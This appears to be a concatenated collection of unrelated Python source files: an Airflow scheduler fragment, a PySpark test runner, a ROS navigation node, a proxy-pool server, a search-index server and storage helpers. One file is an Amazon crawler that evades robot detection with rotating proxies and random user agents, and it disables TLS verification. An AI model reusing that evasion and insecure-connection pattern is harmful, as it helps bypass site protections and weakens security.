#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
# For the execute duration, parse and schedule DAGs
while (timezone.utcnow() - execute_start_time).total_seconds() < \
self.run_duration or self.run_duration < 0:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self._get_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag):
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: unicode
:param zombies: zombie task instances to kill.
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: list[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = [dag.dag_id for dag in dagbag.dags.values()
if dag.is_paused]
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
if len(self.dag_ids) > 0:
dags = [dag for dag in dagbag.dags.values()
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dagbag.dags.values()
if not dag.parent_dag and
dag.dag_id not in paused_dag_ids]
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
run-tests.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import logging
from optparse import OptionParser
import os
import re
import subprocess
import sys
import tempfile
from threading import Thread, Lock
import time
if sys.version < '3':
import Queue
else:
import queue as Queue
from distutils.version import LooseVersion
# Append `SPARK_HOME/dev` to the Python path so that we can import the sparktestsupport module
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), "../dev/"))
from sparktestsupport import SPARK_HOME # noqa (suppress pep8 warnings)
from sparktestsupport.shellutils import which, subprocess_check_output # noqa
from sparktestsupport.modules import all_modules, pyspark_sql # noqa
python_modules = dict((m.name, m) for m in all_modules if m.python_test_goals if m.name != 'root')
def print_red(text):
print('\033[31m' + text + '\033[0m')
LOG_FILE = os.path.join(SPARK_HOME, "python/unit-tests.log")
FAILURE_REPORTING_LOCK = Lock()
LOGGER = logging.getLogger()
# Find out where the assembly jars are located.
# Later, add back 2.12 to this list:
# for scala in ["2.11", "2.12"]:
for scala in ["2.11"]:
build_dir = os.path.join(SPARK_HOME, "assembly", "target", "scala-" + scala)
if os.path.isdir(build_dir):
SPARK_DIST_CLASSPATH = os.path.join(build_dir, "jars", "*")
break
else:
raise Exception("Cannot find assembly build directory, please build Spark first.")
def run_individual_python_test(test_name, pyspark_python):
env = dict(os.environ)
env.update({
'SPARK_DIST_CLASSPATH': SPARK_DIST_CLASSPATH,
'SPARK_TESTING': '1',
'SPARK_PREPEND_CLASSES': '1',
'PYSPARK_PYTHON': which(pyspark_python),
'PYSPARK_DRIVER_PYTHON': which(pyspark_python)
})
LOGGER.info("Starting test(%s): %s", pyspark_python, test_name)
start_time = time.time()
try:
per_test_output = tempfile.TemporaryFile()
retcode = subprocess.Popen(
[os.path.join(SPARK_HOME, "bin/pyspark"), test_name],
stderr=per_test_output, stdout=per_test_output, env=env).wait()
except:
LOGGER.exception("Got exception while running %s with %s", test_name, pyspark_python)
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(1)
duration = time.time() - start_time
# Exit on the first failure.
if retcode != 0:
try:
with FAILURE_REPORTING_LOCK:
with open(LOG_FILE, 'ab') as log_file:
per_test_output.seek(0)
log_file.writelines(per_test_output)
per_test_output.seek(0)
for line in per_test_output:
decoded_line = line.decode()
if not re.match('[0-9]+', decoded_line):
print(decoded_line, end='')
per_test_output.close()
except:
LOGGER.exception("Got an exception while trying to print failed test output")
finally:
print_red("\nHad test failures in %s with %s; see logs." % (test_name, pyspark_python))
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
else:
per_test_output.close()
LOGGER.info("Finished test(%s): %s (%is)", pyspark_python, test_name, duration)
def get_default_python_executables():
python_execs = [x for x in ["python2.7", "python3.6", "pypy"] if which(x)]
if "python2.7" not in python_execs:
LOGGER.warning("Not testing against `python2.7` because it could not be found; falling"
" back to `python` instead")
python_execs.insert(0, "python")
return python_execs
def parse_opts():
parser = OptionParser(
prog="run-tests"
)
parser.add_option(
"--python-executables", type="string", default=','.join(get_default_python_executables()),
help="A comma-separated list of Python executables to test against (default: %default)"
)
parser.add_option(
"--modules", type="string",
default=",".join(sorted(python_modules.keys())),
help="A comma-separated list of Python modules to test (default: %default)"
)
parser.add_option(
"-p", "--parallelism", type="int", default=4,
help="The number of suites to test in parallel (default %default)"
)
parser.add_option(
"--verbose", action="store_true",
help="Enable additional debug logging"
)
(opts, args) = parser.parse_args()
if args:
parser.error("Unsupported arguments: %s" % ' '.join(args))
if opts.parallelism < 1:
parser.error("Parallelism cannot be less than 1")
return opts
def _check_dependencies(python_exec, modules_to_test):
# If we should test 'pyspark-sql', it checks if PyArrow and Pandas are installed and
# explicitly prints out. See SPARK-23300.
if pyspark_sql in modules_to_test:
# TODO(HyukjinKwon): Relocate and deduplicate these version specifications.
minimum_pyarrow_version = '0.8.0'
minimum_pandas_version = '0.19.2'
try:
pyarrow_version = subprocess_check_output(
[python_exec, "-c", "import pyarrow; print(pyarrow.__version__)"],
universal_newlines=True,
stderr=open(os.devnull, 'w')).strip()
if LooseVersion(pyarrow_version) >= LooseVersion(minimum_pyarrow_version):
LOGGER.info("Will test PyArrow related features against Python executable "
"'%s' in '%s' module." % (python_exec, pyspark_sql.name))
else:
LOGGER.warning(
"Will skip PyArrow related features against Python executable "
"'%s' in '%s' module. PyArrow >= %s is required; however, PyArrow "
"%s was found." % (
python_exec, pyspark_sql.name, minimum_pyarrow_version, pyarrow_version))
except:
LOGGER.warning(
"Will skip PyArrow related features against Python executable "
"'%s' in '%s' module. PyArrow >= %s is required; however, PyArrow "
"was not found." % (python_exec, pyspark_sql.name, minimum_pyarrow_version))
try:
pandas_version = subprocess_check_output(
[python_exec, "-c", "import pandas; print(pandas.__version__)"],
universal_newlines=True,
stderr=open(os.devnull, 'w')).strip()
if LooseVersion(pandas_version) >= LooseVersion(minimum_pandas_version):
LOGGER.info("Will test Pandas related features against Python executable "
"'%s' in '%s' module." % (python_exec, pyspark_sql.name))
else:
LOGGER.warning(
"Will skip Pandas related features against Python executable "
"'%s' in '%s' module. Pandas >= %s is required; however, Pandas "
"%s was found." % (
python_exec, pyspark_sql.name, minimum_pandas_version, pandas_version))
except:
LOGGER.warning(
"Will skip Pandas related features against Python executable "
"'%s' in '%s' module. Pandas >= %s is required; however, Pandas "
"was not found." % (python_exec, pyspark_sql.name, minimum_pandas_version))
def main():
opts = parse_opts()
if (opts.verbose):
log_level = logging.DEBUG
else:
log_level = logging.INFO
logging.basicConfig(stream=sys.stdout, level=log_level, format="%(message)s")
LOGGER.info("Running PySpark tests. Output is in %s", LOG_FILE)
if os.path.exists(LOG_FILE):
os.remove(LOG_FILE)
python_execs = opts.python_executables.split(',')
modules_to_test = []
for module_name in opts.modules.split(','):
if module_name in python_modules:
modules_to_test.append(python_modules[module_name])
else:
print("Error: unrecognized module '%s'. Supported modules: %s" %
(module_name, ", ".join(python_modules)))
sys.exit(-1)
LOGGER.info("Will test against the following Python executables: %s", python_execs)
LOGGER.info("Will test the following Python modules: %s", [x.name for x in modules_to_test])
task_queue = Queue.PriorityQueue()
for python_exec in python_execs:
# Check if the python executable has proper dependencies installed to run tests
# for given modules properly.
_check_dependencies(python_exec, modules_to_test)
python_implementation = subprocess_check_output(
[python_exec, "-c", "import platform; print(platform.python_implementation())"],
universal_newlines=True).strip()
LOGGER.debug("%s python_implementation is %s", python_exec, python_implementation)
LOGGER.debug("%s version is: %s", python_exec, subprocess_check_output(
[python_exec, "--version"], stderr=subprocess.STDOUT, universal_newlines=True).strip())
for module in modules_to_test:
if python_implementation not in module.blacklisted_python_implementations:
for test_goal in module.python_test_goals:
if test_goal in ('pyspark.streaming.tests', 'pyspark.mllib.tests',
'pyspark.tests', 'pyspark.sql.tests'):
priority = 0
else:
priority = 100
task_queue.put((priority, (python_exec, test_goal)))
def process_queue(task_queue):
while True:
try:
(priority, (python_exec, test_goal)) = task_queue.get_nowait()
except Queue.Empty:
break
try:
run_individual_python_test(test_goal, python_exec)
finally:
task_queue.task_done()
start_time = time.time()
for _ in range(opts.parallelism):
worker = Thread(target=process_queue, args=(task_queue,))
worker.daemon = True
worker.start()
try:
task_queue.join()
except (KeyboardInterrupt, SystemExit):
print_red("Exiting due to interrupt")
sys.exit(-1)
total_duration = time.time() - start_time
LOGGER.info("Tests passed in %i seconds", total_duration)
if __name__ == "__main__":
main()
|
goal_generation_node copy.py
|
#!/bin/python3
import time
import rospy
import std_msgs.msg as ros_std_msg
import geometry_msgs.msg as ros_geom_msg
from threading import Thread
import numpy as np
from datetime import datetime
import tf
import actionlib
import move_base_msgs.msg as ros_mb_msg
# --------------------
# GENERAL NOTES
# - In this script, a semantic navigation system is implemented for a robot in
# an underground environment. The expected inputs for this node are:
# - /gallery_angles: These are obtained by a different node. List of
# angles wrt the robot in which direction a gallery is found. This also
# includes the current gallery aka, the front and the back.
# - /tile_type: This topic should continually publish whether the robot is
# in an intersection, a rect, a curve etc...
#
#
# --------------------
def euler_to_quaternion(yaw, pitch, roll):
qx = np.sin(roll/2) * np.cos(pitch/2) * np.cos(yaw/2) - \
np.cos(roll/2) * np.sin(pitch/2) * np.sin(yaw/2)
qy = np.cos(roll/2) * np.sin(pitch/2) * np.cos(yaw/2) + \
np.sin(roll/2) * np.cos(pitch/2) * np.sin(yaw/2)
qz = np.cos(roll/2) * np.cos(pitch/2) * np.sin(yaw/2) - \
np.sin(roll/2) * np.sin(pitch/2) * np.cos(yaw/2)
qw = np.cos(roll/2) * np.cos(pitch/2) * np.cos(yaw/2) + \
np.sin(roll/2) * np.sin(pitch/2) * np.sin(yaw/2)
return [qx, qy, qz, qw]
class Nodo:
"""La clase nodo está pensada para almacenar
los distintos nodos del mapa, así como las
relaciones entre las diferentes galerías que
a las que está conectado."""
def __init__(self, map, n_galleries):
self.n_galleries = n_galleries
class Galeria:
def __init__(self, map):
# A gallery can only connect two nodes
self.map = map
self.nodes = [None, None]
class Mapa:
"""La clase mapa está pensada para almacenar
una serie de nodos conectados por galerías,
y conservar las relaciones entre estos nodos"""
def __init__(self) -> None:
self.nodes = list()
self.galleries = list()
class GoalGenerationNode:
def __init__(self, goal_time_interval=1, goal_distance=3):
self.instructions = rospy.get_param("/instructions")
self.n_instruction = 0
self.block_update_of_quadrants = False
self.goal_time_interval = goal_time_interval
self.goal_distance = goal_distance
self.reset_quadrants()
self.time = datetime.now()
self.seq = 0
rospy.init_node(self.__class__.__name__)
self.listener = tf.TransformListener()
self.tf_transformer = tf.TransformerROS()
self.tile_type_subscriber = rospy.Subscriber(
"/environment_label", ros_std_msg.String, callback=self.tile_type_callback)
self.gallery_subscriber = rospy.Subscriber(
"/gallery_detection_vector", ros_std_msg.Float32MultiArray, self.gallery_detection_callback)
self.move_base_client = actionlib.SimpleActionClient("move_base",ros_mb_msg.MoveBaseAction)
if not self.move_base_client.wait_for_server(rospy.Duration(5)):
rospy.logerr("THERE IS NO MOVE BASE NODE")
self.first_callback = False
while not self.first_callback:
rospy.sleep(0.5)
self.run_thread = Thread(target=self.run)
self.already_chosen_exit = False
self.run_thread.start()
self.run_thread.join()
def reset_quadrants(self):
self.quadrants = { "front":[],
"left": [],
"right":[],
"back":[]
}
def tile_type_callback(self, msg: ros_std_msg.String):
self.tile_type = msg.data
def array_position_to_angle(self, array_position):
return 180 - array_position
def get_galleries_from_vector(self, vector):
self.vector = vector
self.filtered = np.zeros(360)
for i in range(360):
to_check = vector[i]
self.filtered[i] = to_check
for j in range(31):
subsection_index = ((-15 + j) + i) % 356
if vector[subsection_index] > to_check:
self.filtered[i] = 0
max_peak = np.max(self.filtered)
galleries_indices = np.nonzero(self.filtered > max_peak * 0.5)
galleries_angles = []
for index in galleries_indices:
galleries_angles.append(
self.array_position_to_angle(index)/180.0 * np.math.pi)
return np.array(galleries_angles)[0]
def gallery_detection_callback(self, msg: ros_std_msg.Float32MultiArray):
""" This function should take the input from the neural network, and
translate it to quadrants"""
if self.block_update_of_quadrants:
return
self.updating_quadrants = True
data = np.array(msg.data)
angles_of_galleries = self.get_galleries_from_vector(data)
self.reset_quadrants()
for angle in angles_of_galleries:
if angle > -np.math.pi/4 and angle < np.math.pi/4:
self.quadrants["front"].append(angle)
elif angle > -np.math.pi*3/4 and angle < -np.math.pi/4:
self.quadrants["right"].append(angle)
elif angle > np.math.pi/4 and angle < np.math.pi*3/4:
self.quadrants["left"].append(angle)
elif angle > np.math.pi*3/4 or angle < -np.math.pi*3/4:
self.quadrants["back"].append(angle)
self.gallery_in_quadrant = [self.quadrants[q].__len__()>0 for q in self.quadrants.keys()]
self.in_intersection = sum(self.gallery_in_quadrant) > 2
self.first_callback = True
self.updating_quadrants = False
def is_there_exit(self, quadrant:str):
return len(self.quadrants[quadrant]) > 0
def goal_from_angle(self, angle):
goal = ros_geom_msg.PoseStamped()
goal.header.frame_id = "base_link"
goal.header.seq = self.seq
goal.header.stamp = rospy.Time.now()
self.seq += 1
quaternion = euler_to_quaternion(angle, 0, 0)
goal.pose.orientation.x = quaternion[0]
goal.pose.orientation.y = quaternion[1]
goal.pose.orientation.z = quaternion[2]
goal.pose.orientation.w = quaternion[3]
goal.pose.position.x = self.goal_distance * np.math.cos(angle)
goal.pose.position.y = self.goal_distance * np.math.sin(angle)
goal.pose.position.z = 0
# Transform the goal to the map frame
t = self.listener.getLatestCommonTime("odom", "base_link")
self.tf_transformer._buffer = self.listener._buffer
goal.header.stamp = t
goal = self.tf_transformer.transformPose("odom", goal)
goal_msg = ros_mb_msg.MoveBaseGoal()
goal_msg.target_pose = goal
return goal_msg
def generate_and_send_goal(self):
print("Generate and send goal")
self.only_back = False
while self.updating_quadrants:
time.sleep(0.01)
self.block_update_of_quadrants = True
print(self.quadrants)
if self.in_intersection:
if self.already_chosen_exit:
goal_msg = self.goal_from_angle(self.quadrants["front"][0])
else:
goal_msg = self.goal_from_angle(self.quadrants[self.instructions[self.n_instruction]][0])
self.already_chosen_exit = True
self.n_instruction += 1
else:
self.already_chosen_exit = False
if self.gallery_in_quadrant[0]:
goal_msg = self.goal_from_angle(self.quadrants["front"][0])
print("going front")
elif self.gallery_in_quadrant[1]:
goal_msg = self.goal_from_angle(self.quadrants["right"][0])
print("going right")
elif self.gallery_in_quadrant[2]:
goal_msg = self.goal_from_angle(self.quadrants["left"][0])
print("going left")
elif self.gallery_in_quadrant[3]:
goal_msg = self.goal_from_angle(self.quadrants["back"][0])
print("going back")
self.block_update_of_quadrants = True
self.move_base_client.send_goal(goal_msg,done_cb=self.done_cb,active_cb=self.active_cb,feedback_cb=self.feedback_cb)
self.previous_goal = goal_msg
def done_cb(self,msg, msg2):
self.generate_and_send_goal()
def active_cb(self):
pass
def feedback_cb(self, msg):
pass
def run(self):
# while not rospy.is_shutdown():
# self.generate_and_send_goal()
# rospy.sleep(self.goal_time_interval)
self.generate_and_send_goal()
if __name__ == "__main__":
goal_generation_node = GoalGenerationNode()
rospy.spin()
|
crawl_info.py
|
"""
Crawl info for further use
"""
import time
import random
import threading
from fake_useragent import UserAgent
from bs4 import BeautifulSoup
import redis
import urllib3
import requests
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ua = UserAgent()
db = redis.StrictRedis(host='127.0.0.1', port=6379, decode_responses=True)
THREAD_NUM = 70
ip_dict = {}
def parser(html, raw_movie_id, proxy):
"""
Check the Sent html
"""
soup = BeautifulSoup(html, 'lxml')
element = soup.find(id='productTitle')
title = ''
# Get The Title
if element is None:
element = soup.find('h1', attrs={'class': 'avu-full-width'})
if element is None: # Error
db.sadd('raw_movie_id', raw_movie_id) # put back
print('Robot Detect!!!!!!!!!!!!!!!!!!!!!!')
if proxy in ip_dict:
ip_dict[proxy] += 1
if ip_dict[proxy] > 10:
requests.get('http://127.0.0.1:5010/delete?proxy=' + proxy) # delete proxy
else:
ip_dict[proxy] = 1
return False
else: # Prime Video Page
title = element.text
else: # Simple Page
title = element.text
if 'Director' not in html: # A movie must have a director
return False
if 'Season' in html: # TV show
return False
if 'Fitness' in html: # Not a moive
return False
if 'Music Videos' in html:
return False
if 'Concerts' in html:
return False
db.sadd('real_movie_id', raw_movie_id)
return True
def get_and_parse(number):
"""
Get raw_movie_id, proxy and html, Send them to the Parser
"""
header = {
'User-Agent': ua.random,
'accept-language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.6',
'accept': 'text/html,application/xhtml+xml,application/xml;\
q=0.9,image/webp,image/apng,*/*;q=0.8',
'accept-encoding': 'gzip, deflate, br'
}
raw_movie_id = db.spop('raw_movie_id')
url = 'https://www.amazon.com/dp/' + raw_movie_id
r = requests.get('http://127.0.0.1:5010/get_all/').json()
if not r:
proxy = '127.0.0.1:1087'
else:
proxy = random.choice(r)
try:
proxier = {'https' : 'http://' + proxy}
response = requests.get(url, headers=header, proxies=proxier, timeout=10, verify=False)
except Exception:
db.sadd('raw_movie_id', raw_movie_id)
print('Requests Failure!\n\n')
else:
if response.status_code == 404:
print('Getting ' + url)
print('Number ' + str(number))
print('Page 404' + '\n\n')
elif response.status_code == 200: # get tittle
if parser(response.text, raw_movie_id, proxy):
print('Getting ' + url)
print('Number ' + str(number))
print('Yes!' + '\n\n')
else:
print('Getting ' + url)
print('Number ' + str(number))
print('Nope!' + '\n\n')
else:
print('Getting ' + url)
print('Number ' + str(number))
print('Something Wrong!')
db.sadd('raw_movie_id', raw_movie_id)
print(str(response.status_code) + '\n\n')
if __name__ == '__main__':
for i in range(250000):
while threading.active_count() > THREAD_NUM: # Change
t = 5 * random.random()
if t < 0.5:
t += 1.5
elif t > 3.5:
t -= 2.5
time.sleep(t)
t = threading.Thread(target=get_and_parse, args=(i,))
t.start()
while threading.active_count() > 1: # Wait the thread I created to finish
time.sleep(0.2)
print('------------Finish-----------')
|
main.py
|
# -*- coding: utf8 -*-
import random
import time
import logging
import tornado.ioloop
import tornado.web
from threading import Thread
from tornado.options import define, options
from tornado.httpserver import HTTPServer
from spider import xici
from check import checkProxy
define("port", default=8080, type=8080, help="server port")
class ProxyApi(tornado.web.RequestHandler):
def get(self):
return_dict = {}
totle = self.get_argument("totle", 0)
try:
totle = int(totle)
except:
totle = 0
from db import cacheDB
proxy_db = cacheDB.proxyDB
proxy_pool = proxy_db.getValue("proxy_pool")
if len(proxy_pool) <= totle:
totle_proxy_list = proxy_pool
else:
totle_proxy_list = random.sample(proxy_pool, totle)
for i, k in enumerate(totle_proxy_list, 1):
return_dict[i] = k
self.write(return_dict)
def post(self):
self.get()
def proxy_threading():
"""
爬虫任务进程
:return:
"""
# 使用最暴利的方法循环的去执行获取和校验爬虫代理的任务
while True:
xici.xici_spider(3)
checkProxy.verify_proxy_pool()
# 睡眠15分钟再次执行任务
time.sleep(60 * 10)
proxyThread = proxy_threading
def run_server():
"""
服务运行入口
:return:
"""
app = tornado.web.Application(
[(r"/api", ProxyApi)]
)
options.parse_command_line()
http_server = HTTPServer(app)
http_server.bind(options.port)
http_server.start()
# 另外启动一个线程执行爬虫任务
proxy_thread = Thread(target=proxyThread)
proxy_thread.start()
logging.info("Server is running......")
tornado.ioloop.IOLoop.current().start()
if __name__ == "__main__":
run_server()
|
idx_server.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
idx_server.py -
author: Pablo Caruana
email: pablo dot caruana at gmail dot com
date: 12/1/2016
"""
import time
import schedule
import requests
from flask import Flask, jsonify, request
from threading import Thread
import os
from query_processing import query_main
from indexed_chunks import snippet_builder
from read_chunk import get_chunk
try:
os.makedirs("content_files")
except OSError:
if not os.path.isdir("content_files"):
raise
app = Flask(__name__)
s = requests.Session()
mgmt_ip_addr = '54.159.82.218'
index_builder_ip_addr = '54.174.171.194'
crawler_ip_addr = '52.90.210.211'
THE_IDX = {}
content_chunk_list = []
# For test
@app.route('/', methods=['GET'])
def hello_world():
return jsonify(message="Hello World!")
# For management
online = s.post('http://{0}:5000/set_state/component'.format(mgmt_ip_addr), json={"state": "online"})
print(online.json())
@app.route('/get_health', methods=['GET'])
def is_healthy():
return jsonify(status = "healthy")
# From Management and Index-builder
def run_schedule():
while True:
schedule.run_pending()
time.sleep(1)
def get_chunks():
chunk_metadata = s.get('http://{0}:5000/get_chunks'.format(mgmt_ip_addr)) # list of dicts
print(chunk_metadata)
crawler_host_dict = {}
ib_host_dict = {}
global content_chunk_list
for item in chunk_metadata:
crawler_host_dict[item['chunk_id']] = item['hosts']['c_host']
ib_host_dict[item['chunk_id']] = item['hosts']['ib_host']
print("crawler_host_dict:{0}".format(crawler_host_dict))
print("ib_host_dict:{0}".format(ib_host_dict))
for k, v in ib_host_dict.items():
json_file = requests.get('http://{1}:5000/indexed_chunk/indexed_{0}.json'.format(k, v))
THE_IDX.update(json_file.json()) # Saving to the main index as a dictionary
print("Index recorded for chunk: {0}".format(k))
for k, v in crawler_host_dict.items():
content_data = requests.get('http://{1}:5000/get_chunk/{0}'.format(k, v), stream=True)
with open("content_files/{0}".format(k), "wb") as f:
f.write(content_data.content)
f.close
print("Content file created for chunk: {0}".format(k))
content_chunk = get_chunk("content_files/{0}".format(k))
content_chunk_list += content_chunk
# For front-end
@app.route('/getdocids/search', methods=['GET'])
def get_query():
q = request.args.get('q')
dict_of_ids_with_ranks = query_main(q)
return jsonify(dict_of_ids_with_ranks)
@app.route('/get_snippet', methods=['GET'])
def get_snippet():
id_ = request.args.get('id')
snippets = snippet_builder(id_)
return jsonify(snippets)
if __name__ == '__main__':
schedule.every(10).seconds.do(get_chunks)
t = Thread(target=run_schedule())
t.start()
app.run(debug = True, port = 5000)
|
get_urls_text.py
|
# -*- coding: utf-8 -*-
from codecs import open
import json
import threading, queue
import argparse
import time
import random
import re
from urllib.request import urlopen
import pickle
from bs4 import BeautifulSoup
from nltk import word_tokenize
from nltk.util import ngrams
from collections import Counter
from langdetect import detect
from langdetect import DetectorFactory
DetectorFactory.seed = 0
#import tensorflow as tf
#import numpy as np
import html2text
#import htmlparser
def upload_blob(bucket_name, source_file_name, destination_blob_name):
"""Uploads a file to the bucket."""
# bucket_name = "your-bucket-name"
# source_file_name = "local/path/to/file"
# destination_blob_name = "storage-object-name"
storage_client = storage.Client()
bucket = storage_client.bucket(bucket_name)
blob = bucket.blob(destination_blob_name)
blob.upload_from_filename(source_file_name)
print(
"File {} uploaded to {}.".format(
source_file_name, destination_blob_name
)
)
def download_blob(bucket_name, source_blob_name, destination_file_name):
"""Downloads a blob from the bucket."""
# bucket_name = "your-bucket-name"
# source_blob_name = "storage-object-name"
# destination_file_name = "local/path/to/file"
storage_client = storage.Client()
bucket = storage_client.bucket(bucket_name)
# Construct a client side representation of a blob.
# Note `Bucket.blob` differs from `Bucket.get_blob` as it doesn't retrieve
# any content from Google Cloud Storage. As we don't need additional data,
# using `Bucket.blob` is preferred here.
blob = bucket.blob(source_blob_name)
blob.download_to_filename(destination_file_name)
print(
"Blob {} downloaded to {}.".format(
source_blob_name, destination_file_name
)
)
q = queue.Queue()
